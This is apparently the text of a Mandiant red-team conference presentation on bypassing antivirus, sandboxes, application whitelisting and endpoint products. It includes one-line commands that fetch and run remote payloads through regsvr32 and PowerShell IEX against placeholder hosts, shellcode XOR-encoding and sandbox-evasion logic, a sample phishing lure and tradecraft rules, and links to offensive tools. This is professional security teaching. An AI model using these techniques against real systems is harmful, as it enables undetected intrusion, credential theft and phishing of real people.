1 © Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL © Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Bypassing Advanced Security Controls Charles F. Hamilton Senior consultant at Mandiant 

About me • Charles F. Hamilton, Senior Consultant at Mandiant, OSCP, OSCE, GREM • Founder of the RingZer0 Team online CTF since 2014 • 6+ years performing RedTeam/web application/Infrastructure testing for: o Banks, Nuclear, Education o Aerospace, Financial institutions, Insurance companies, Law firms • Enjoy writing low-level language code (Assembly, C) • Publicly published ~10 CVEs, ~100 of them unpublished 

Summary 0x1 The Reason Behind Evasions and Bypasses 0x2 Bypasses & Evasions VS Obfuscation 0x3 Using Custom Executable 0x4 Using Whitelisted Signed Binaries 0x5 The Case of PowerShell 0x6 Endpoint Solutions and Hooks 0x7 Phishing Your Way In 0x8 Targeting the Endpoint Security Product Itself 

0x1 The Reason Behind Evasion and Bypasses Mature companies usually have several layers of protection to prevent attacks e 

0x1 The Reason Behind Evasion and Bypasses • To achieve untrusted code execution on a targeted workstation, an attacker has to go through all of these layers • The classic approach used to avoid being detected is to act differently when executed on a security product. Usually by preventing the execution of the malicious payload based on some fingerprinting • An attacker that managed to bypass all of the security layers will be able to execute code on the target system without being detected 

0x2 Bypasses & Evasions VS Obfuscation Prioritize bypass and evasion over obfuscation Examples: $a = 3; // Original code $a = 1 + 2; // Obfuscated if(context == “sandbox”) { $a = 3; } else { exit() } // Evasion 

Problem with Sandbox solutions: They are fingerprintable and predictable Differences between endpoints (workstations/servers) and sandboxes: • Memory size (endpoint at least 4 Gb) • Disk size (endpoint at least 250 Gb) • Number of CPUs (endpoint at least 2 CPUs) • Processes currently running (if you send the sample by email, is OUTLOOK.exe running) • Network access (does the sandboxes have network access) • Joined to a domain (sandboxes are usually not joined to the corporate domain) • Time zone (Targeting a Canadian company) • Detecting hook (Sandboxes usually hook known APIs functions) • … 0x3 Using Custom Executable 

0x3 Using Custom Executable Let's build our malicious payload. In this case we are going to rely on Cobalt Strike reverse HTTPS shellcode The following snippet of code will simply run the shellcode as is: There are two major issues: ▪ The shellcode is well-known, most solutions will catch it (network, and on- disk analysis) ▪ The code always attempts to execute the malicious payload 

0x3 Using Custom Executable First step is to evade the shellcode detection. Simplest way to achieve this goal is to encode it. Classic XOR is usually enough The idea: • Generate a random key (32 bit integer value DWORD) • Use the key to xor each 32 bit chunk of the original shellcode • Create a little assembly decryption stub that brute forces the key • Jump to the decoded version of the shellcode Key 0x2b403db7 0x2b403db7 0x2b403db7 ⊕ ⊕ ⊕ Shellcode 0xfce88600 0x00006089 0xe531d264 = = = Encoded 0xd7a8bbb7 0x2b405d3e 0xce71efd3 

0x3 Using Custom Executable Original payload Encoded shellcode + decoder 

0x3 Using Custom Executable • Our payload is now AV, and IDS/IPS friendly. • To evade live analysis we need to find a way to avoid launching the payload in a sandbox environment. • Check the user domain: 

0x3 Using Custom Executable Our final payload now looks like is 

0x3 Using Custom Executable Pros: ▪ This kind of payload will usually pass through pretty much everything except for endpoint protection ▪ Flexible, you can create your own evasion/bypass technique Cons: ▪ Since the endpoint is meeting all the requirements, it will execute the payload the malicious code will be executed and potentially detected ▪ Your payload will be written to the target disk 

0x4 Using Whitelisted Signed Binaries • Endpoint solutions rely on heuristic detection, pattern matching, behavior, and enforced application whitelisting • The idea behind this approach is using Windows signed binaries that can be used to execute code 

0x4 Using Whitelisted Signed Binaries Several Windows binaries have been identified as good candidates for command execution: ▪ cdb.exe ▪ installutil.exe ▪ regsvr32.exe ▪ rundll32.exe ▪ msbuild.exe ▪ regasm.exe ▪ … Methods to execute code through all these binaries are well documented. 

0x4 Using Whitelisted Signed Binaries • cdb.exe is a Microsoft Windows signed binary that can be used to perform applications debugging. The debugger also provides a functionality that can be used to execute arbitrary command echo .shell whoami | cdb.exe C:\windows\system32\ipconfig.exe 

0x4 Using Whitelisted Signed Binaries • It is also possible to execute shellcode directly using other whitelisted applications regsvr32 /s /u /i:https://c2domain/payload.sct scrobj.dll • This command will run payload.sct, which is a vbscript, and executes the final payload only relying on trusted binaries 

0x4 Using Whitelisted Signed Binaries Pros: ▪ Several whitelisting bypasses can be chained together to defeat endpoint solutions ▪ For example, executing the binary that we’ve created in the previous section using an application whitelisting bypass will probably pass through all the security layers Cons: ▪ These techniques are well known in the security industry, more advanced endpoint security products now block these known applications even if they are whitelisted ▪ Limited on the kind of payload you can execute ▪ Easy to prevent/block 

0x5 The Case of PowerShell PowerShell is basically a built-in RAT for hackers and it comes with the following features: ▪ In memory execution ▪ Full scripting engine ▪ Access to .NET language (C#) ▪ Access to Windows API ▪ Trusted Microsoft Windows signed binary 

0x5 The Case of PowerShell • PowerShell allows you to execute PowerShell scripts in memory without touching the disk • IEX (Invoke-Expression): IEX (New-Object Net.WebClient).DownloadString ("https://evil.domain/payload.ps1"); • Script Block: $cmd = (New-Object Net.WebClient).DownloadString("https://evil.domain/payload.ps1"); ([ScriptBlock]::Create($cmd).Invoke(); • Manual Approach: ▪ Use PowerShell functionalities to get VirtualAlloc function pointer and CreateThread ▪ Copy your shellcode into the memory location ▪ The shellcode can be dynamically downloaded using Net.WebClient DownloadString method ▪ Jump to it using CreateThread and execute the shellcode 

21 © Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL 0x5 The Case of PowerShell • Executing code on a remote host without having credentials • Kerberos tickets can be used within PowerShell context PS> module-import .\Remote-WmiExecute.ps1; Remote-WmiExecute -ComputerName victim01 -Payload "cmd.exe /c whoami" 

0x6 Endpoint Solutions and Hooks Most of the endpoint solutions rely on hooks at different levels: • I/O • Networking • Windows APIs Simply encrypt the payload a second time at the application level Default PowerShell mimikatz.ps1 ⊕ Encrypted using RC4 ⊕ Send over HTTPS ⊕ Windows decrypt the HTTPS stream ⊕ Network hook PowerShell RAT decrypt the RC4 

0x6 Endpoint Solutions and Hooks 

0x6 Endpoint Solutions and Hooks To defeat on-disk activities is quite simple: never write anything on disk PowerShell in-memory can run pretty much everything, including binaries 

0x7 Phishing Your Way In Five rules of successful phishing: • Don’t put your malicious payload in the email • Don’t allow automated solution to be able to access your final payload • Use categorized domains • Try to fingerprint your victim as much as possible • Use HTTPS with a valid certificate (not self-signed) 

0x7 Phishing Your Way In Rule #1: Don’t put your malicious payload in the email • Usually sending the phishing email with a link to a server that we control Hi Bob, We are currently updating our code of conduct policy please review and accept as soon as possible. The code of conduct can be found here: https://phishy.domain/company/code/a2ef362e-45d0-b21d-5abf-edce29d365cb/ Thank you, Bobby from HR 

0x7 Phishing Your Way In Rule #2: Don’t allow automated solutions to be able to access your final payload: Let’s assume the HTML on the website looks like this: download the code of conduct Automated security can easily parse the HTML and find the link to the payload. download the code of conduct document.getElementById("download").onclick = function() { document.location = "https://phish" + "y.domain/pay" + "load.docm"; }; document.getElementById("download").click(); The click event is now dynamically generated using JavaScript. Most of the automated tools do not interpret the JavaScript and do not follow redirection. 

0x7 Phishing Your Way In Rule #3: Use categorized domains: • Before the assessment, simply clone a legitimate website and ask the security products to categorize your domain • Hunting for already categorized expired domains can be useful Simple as that ☺ 

0x7 Phishing Your Way In Rule #4: Try to fingerprint your victim as much as possible: • If you can fingerprint the domain used by the targeted company, adding a check similar to the one used for binaries can also save you • Based on the kind of solution they use, sometime a macro will provide better result than HTA or ClickOnce if(context != “sandbox”) { execute you final stage } Rule #5: Use HTTPS with a valid certificate: • Let’s Encrypt can provide you free certificate 

0x8 Targeting the Endpoint Security Product Companies use different approaches to detect threats: • Blacklisting known malicious binaries • Hash based • Heuristics • … 

0x8 Targeting the Endpoint Security Product Certain solutions will blacklist known potential malicious files, even if they are Microsoft Signed Binaries • cdb.exe • installutil.exe • regsvr32.exe • rundll32.exe • msbuild.exe • regasm.exe They generally keep track of the binary hash (including old version such as Windows 2000) 

0x8 Targeting the Endpoint Security Product Since the detection is hash based, changing a single byte will change the hash and defeat it Original: 59bce9f07985f8a4204f4d6554cff708 Modified: 432be6cf7311062633459eef6b242fb5 

0x8 Targeting the Endpoint Security Product • Certain file formats will be trusted more than others: • Untrusted: ▪ exe ▪ ps1 ▪ vbs ▪ docm, pdf • Generally trusted: ▪ Images (PNG, BMP, JPG) • Delivering shellcode inside valid polyglot images: most security engines will not even bother analyzing images ▪ Tools exist: https://github.com/Mr-Un1k0d3r/DKMC 

0x8 Targeting the Endpoint Security Product Using PowerShell without relying on powershell.exe Technique one: C:\>copy %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe %temp%\randomname.txt C:\>%temp%\randomname.txt –Exec bypass whoami Technique two: Use .Net (C# in this case) to invoke PowerShell DLLs directly without using powershell.exe at all 

0x8 Targeting the Endpoint Security Product using System.Management.Automation; Runspace runspace = RunspaceFactory.CreateRunspace(); runspace.Open(); RunspaceInvoke invoke = new RunspaceInvoke(runspace); Pipeline pipe = runspace.CreatePipeline(); pipe.Commands.AddScript("PowerShell script goes here"); pipe.Commands.Add("Out-String"); Collection output = pipe.Invoke(); 

0x8 Targeting the Endpoint Security Product 

37 © Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL 0x9 Tools Search categorized domains https://github.com/Mr-Un1k0d3r/CatMyFish RC4 ThunderShell RAT https://github.com/Mr-Un1k0d3r/ThunderShell Polyglot image to deliver shellcode https://github.com/Mr-Un1k0d3r/DKMC shellcode obfuscator https://github.com/Mr-Un1k0d3r/UniByAv SCT obfuscator (Cobalt Strike, Empire) https://github.com/Mr-Un1k0d3r/SCT- obfuscator PowerShell execution without invoking PowerShell https://github.com/Mr- Un1k0d3r/PowerLessShell Malicious macro generator https://github.com/Mr- Un1k0d3r/MaliciousMacroGenerator Remote WMI execute script https://github.com/Mr- Un1k0d3r/RedTeamPowershellScripts/blob/master/scripts/Remote- WmiExecute.ps1 

38 © Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL EOF Questions? Thank you